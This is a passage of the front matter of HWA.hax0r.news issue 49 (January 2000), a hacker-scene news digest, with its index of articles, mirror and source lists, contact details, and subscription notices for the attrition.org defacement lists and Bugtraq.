[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA 2000=] Number 49 Volume 2 Issue 1 1999 Jan 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

NEW YEAR EDITION: This is #49 covering Dec 26th to Jan 15th

==========================================================================

HWA 2000
Happy New Year!

"Providing news archives of recent events into the new millennium..."

==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Mailing list members: 20 New members over Xmas, we're now at 496.
Can we bump this up somewhat? spread the word!

==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...

Hot Hits

.gov and .mil activity

There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Scratch and Sniff Special!

PRINT OUT THIS ISSUE ON YOUR CORPORATE PRINTER OR DADDY'S PRINTER WHEN HE
ISN'T LOOKING (IT'S KINDA BIG) OR JUST PRINT THIS SECTION OUT WITH A SCREEN
CAPTURE AND SCRATCH THE #'S FOR A GREAT SURPRISE!
##########################################################################
####################################_#####################################
###################################| |####################################
##################################/ __)###################################
##################################\_ \####################################
##################################(   /###################################
###################################|_|####################################
##########################################################################
##########################################################################
##########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

The HWA website is sponsored by CUBESOFT communications I highly
recommend you consider these people for your web hosting needs,

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic. This ethic was best
formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer
Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've endeavoured
to format all text to 80 cols except for articles and site statements and
urls which are posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in 1024x768 mode with
UEDIT.... - Ed

BTW if anyone can suggest a better editor than UEDIT for this thing send me
some email i'm finding it lacking in certain areas. Must be able to produce
standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
*** http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed the file
   size limitations imposed by the sites :-( please only use these if no
   other recourse is available.
*** Most likely to be up to date other than the main site.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info, its a labour of love and
will be continued for as long as I feel like it, i'm not motivated by
dollars or the illusion of fame, did you ever notice how the most
famous/infamous hackers are the ones that get caught? there's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty quiet,
we don't bite (usually) so if you're hanging out on irc stop by and idle a
while and say hi... /join #HWA.hax0r.news on EFnet.

**************************************************************************
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives" - kf

Eris Free Net #HWA.hax0r.news
**************************************************************************
/join #HWA.hax0r.news on EFnet the key is `zwen' when keyed

please join to discuss or impart news on the zine and around the scene or
just to hang out, we get some interesting visitors you could be one of em.

Note that the channel isn't there to entertain you its purpose is to bring
together people interested and involved in the underground to chat about
current and recent events etc, do drop in to talk or hangout. Also if you
want to promo your site or send in news tips its the place to be, just
remember we're not #hack or #chatzone...
**************************************************************************

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with an
idea." - Unknown

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. www.2600.com, jokers to the end?
04.0 .. More irc4all proxies
05.0 .. Simple Windows Dos using common tools and UDP
06.0 .. Slash interviews website defacer/cracker Fuqrag
07.0 .. Interview with sSh member YTcracker
08.0 .. Interview with gH member Mosthated
09.0 .. Mosthated/gH advisory Jan 10th 2000
10.0 .. HNN's 1999 Year In Review 12/26/99
11.0 .. 16th CCC Congress opens Monday in Berlin 12/26/99
12.0 .. Canadian Youth Held for Cyber Ransom 12/26/99
13.0 .. Poulsen's List of Gifts to Get a Hacker 12/26/99
14.0 .. More FUD About Cyberterrosists and Y2K 12/26/99
15.0 .. The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99
16.0 .. One Third of UK Vulnerable to Online Attack 12/27/99
17.0 .. Grades Changed at NY School 12/27/99
18.0 .. Cops Wanted, Hackers Need Not Apply 12/27/99
19.0 .. IDS Signature Database Open to the Public 12/27/99
20.0 .. InfoSecurity 1999 Year in Review 12/27/99
21.0 .. Butchered From Inside 7 12/27/99
22.0 .. DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99
23.0 .. Web Based CGI Vulnerability Scanner Released 12/28/99
24.0 .. L0pht Interviewed by Slashdot 12/28/99
25.0 .. AirForce to Close Web Sites Over Y2K 12/28/99
26.0 .. Sweden Plans Cyber Defense and Attack Force 12/28/99
27.0 .. DVD Industry Files Lawsuit Over DeCSS 12/29/99
28.0 .. No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99
29.0 .. Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99
30.0 .. More from CCC Congress in Germany 12/29/99
31.0 .. Apple Patches OS 9 Security Hole 12/29/99
32.0 .. The need for physical security - Securing the OpenBSD console 12/29/99
33.0 .. New Era: Buffer Overflow Article by evenprime 01/03/00
34.0 .. Gangly Mentality, Y2K hype by ytcracker 01/03/00
35.0 .. "Scene Whores" By Eric Parker/Mind Security 01/03/00
36.0 .. DVD Control Association Looses First Round 01/03/00
37.0 .. First Viruses of the New Year Discovered 01/03/00
38.0 .. Reports from Chaos Computer Congress 01/03/00
39.0 .. Gateway Sells Amiga 01/03/00
40.0 .. CIH Author Hired by Taiwanese Company 01/03/00
41.0 .. Body-Scanners Used by US Customs 01/03/00
42.0 .. Defacements Continue Unabated in the New Year 01/03/00
43.0 .. WebTV Hole Causes Spam 01/04/00
44.0 .. Vandalism or Hactivism? 01/04/00
45.0 .. No Longer Worried About Y2K Feds Look to Security 01/04/00
46.0 .. Interview With Richard Smith 01/04/00
47.0 .. Interview with Adam Penenberg 01/04/00
48.0 .. KISA Discovers Y2K Bug 01/04/00
49.0 .. Sprint Says 'Area 51' Does Exist 01/04/00
50.0 .. Spoofing your HTTP referrer
51.0 .. OSALL removed from the net. 01/13/00
52.0 .. $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper
53.0 .. Bill Gates hands over CEO hat to Steve Ballmer
54.0 .. First Windows 2000 virus found
55.0 .. InterNIC domain name hijacking: "It happens"
56.0 .. "A well known but overlooked threat to Hackers: Themselves"
57.0 .. The complete guide to hax0ring.
58.0 .. FAA Systems Vulnerable Due to Y2K Fixes 01/05/00
59.0 .. Internal Employees Greatest Threat Says New Study 01/05/00
60.0 .. Are the Greatest Risks Internal or External? 01/05/00
61.0 .. Japanese Firms Turn To Security After Y2K 01/05/00
62.0 .. Virus FUD Continues 01/05/00
63.0 .. L0pht Merges With @Stake, Receives Funding 01/06/00
64.0 .. Offensive Cyberwar Capabilities Taking Shape 01/06/00
65.0 .. Army Criticized By Judge On Lack of Security 01/06/00
66.0 .. FAA Responds to Allegations 01/06/00
67.0 .. Electronic Intruder released with Fine and No Jail 01/06/00
68.0 .. PalmCrack 1.0 Released 01/06/00
69.0 .. Radio Pirates (criminals) Steal Police Airwaves 01/06/00
70.0 .. ParseTV has Abruptly Canceled 01/07/00
71.0 .. Finland Authorities Solve Massive Computer Crime Case 01/07/00
72.0 .. The EPA Cracks Down On Security 01/07/00
73.0 .. FBI Still Investigating Y2K Cyber Threats 01/07/00
74.0 .. Clinton Wants Increased Computer Security 01/07/00
75.0 .. Interview with Lloyd's of London and RailTrack Defacer 01/07/00
76.0 .. Pac Bell Hit by Possible Cyber Intruder 01/10/00
77.0 .. Virgin ISP Issues New Passwords 01/10/00
78.0 .. CD Universe Customer Info Compromised 01/10/00
79.0 .. Northwest Notifies Customers of Security Breech 01/10/00
80.0 .. Parse Issues Statement About Cancellation 01/10/00
81.0 .. HACK.CO.ZA DoS attack forces ISP to remove site
82.0 .. Comments on Linux Security 01/10/00
83.0 .. PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00
84.0 .. Taiwan Claims 1000 Viruses In Arsenal 01/10/00
85.0 .. Reno Announces LawNet 01/11/00
86.0 .. Domains Redirected 01/11/00
87.0 .. Report on SuperComputer Sale to China Released 01/11/00
88.0 .. Kevin Mitnick Interview 01/11/00
89.0 .. Encryption Keys Easily Found On Systems 01/11/00
90.0 .. Buffer Overflow: Reform the AV Industry 01/11/00
91.0 .. China Registering Businesses to Monitor the Net 01/12/00
92.0 .. CD Universe Thief Threatens to Post more CC Numbers 01/12/00
93.0 .. Army Plans on DMZs for Its Networks 01/12/00
94.0 .. CBS Alters On Air Images During News 01/12/00
95.0 .. Direct TV Service Stolen in Illinois 01/12/00
96.0 .. Security Book Released on Net for Free 01/12/00
97.0 .. States Can't Sell Private Info 01/14/00
98.0 .. Mitnick Free Next Friday 01/14/00
99.0 .. Internet Banned From Jewish Homes 01/14/00
100.0 .. NJ Teens Steal CC Numbers 01/14/00
101.0 .. Radius Net takes over Attrition Mirrors 01/14/00
102.0 .. New Ezines Available 01/14/00
103.0 .. FBI to Beef Up CyberCrime Investigation Abilities 01/15/00
104.0 .. UDP Called For Against @Home 01/15/00
105.0 .. ACPM Changes Name and Stops Intrusions 01/15/00
106.0 .. GCHQ Wants a Few Good Cryptographers 01/15/00
107.0 .. Internet Intoxication Used as Defense 01/15/00
108.0 .. Blacksun's Unix Security for Newbies version 1.0, 21/11/99
109.0 .. Where are the exploits and advisories??

=-------------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in
        return thats tres cool, if not we'll consider ur ad anyways so send
        it in. ads for other zines are ok too btw just mention us in yours,
        please remember to include links and an email contact. Corporate
        ads will be considered also and if your company wishes to donate to
        or participate in the upcoming Canc0n99 event send in your
        suggestions and ads now...n.b date and time may be pushed back join
        mailing list for up to date information.
        Current dates: POSTPONED til further notice, place: TBA

Ha.Ha .. Humour and puzzles
         Hey You!
         =------=
         Send in humour for this section! I need a laugh and its hard to
         find good stuff... ;)

SITE.1 .. Featured site,
H.W .. Hacked Websites
A.0 .. APPENDICES
A.1 .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT
NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S
COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT
PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE
YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR.
- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And i'm
doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.] HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
are reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal
and send a poor guy a postcard preferably one that has some scenery from
your place of residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard, return
address not necessary, just a "hey guys being cool in Bahrain, take it
easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc................. http://www.cultdeadcow.com/
News site (HNN) ................. http://www.hackernews.com/
Help Net Security................ http://net-security.org/
News,Advisories,++ .(lophtcrack). http://www.l0pht.com/
NewsTrolls .(daily news )........ http://www.newstrolls.com/
News + Exploit archive .......... http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest.. http://www.soci.niu.edu/~cudigest
News site+....................... http://www.zdnet.com/
News site+Security............... http://www.gammaforce.org/
News site+Security............... http://www.projectgamma.com/
News site+Security............... http://securityhole.8m.com/
News site+Security related site.. http://www.403-security.org/
News/Humour site+ ............... http://www.innerpulse.com
News/Techie news site............ http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PLEASE if you have any changes or additions for this section please mail
them to cruciphux@dok.org. Thank you.
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
http://www.hack.co.za/ Current exploits archive

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and
may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box.
- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html

--

defaced [web page defacement announce list]

This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of the mail.

There will be two types of posts to this list:

1. brief announcements as we learn of a web defacement. this will
   include the site, date, and who signed the hack. we will also
   include a URL of a mirror of the hack.

2. at the end of the day, a summary will be posted of all the hacks
   of the day. these can be found on the mirror site listed under
   'relevant links'

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

(1) It is low volume on a normal day. On days of many defacements,
    traffic may be increased. On a few days, it is a virtual mail
    flood. You have been warned. ;)

-=-

--

defaced summary [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced domains
on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.

There will be ONE type of post to this list:

1. a single nightly piece of mail listing all reported domains.
   the same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced
government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with
"subscribe defaced-gm" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military
   (.mil) system defaced. the same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel
charged with tracking security incidents on government run networks.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

--

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce via alpha-numeric pagers,
all publicly defaced government and military domains on a given day.
To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with
"subscribe defaced-alpha" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military
   (.mil) system defaced. the information will only include domain
   names. the same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel
charged with tracking security incidents on government run networks.
Further, it is designed for quick response and aimed at law enforcement
agencies like DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within 12 hours
of receiving the mail to be subscribed. If the response is not received,
it is assumed the mail was not sent to your pager.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.
I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter. I will
allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.
Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the
words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this
list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:

                    BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.

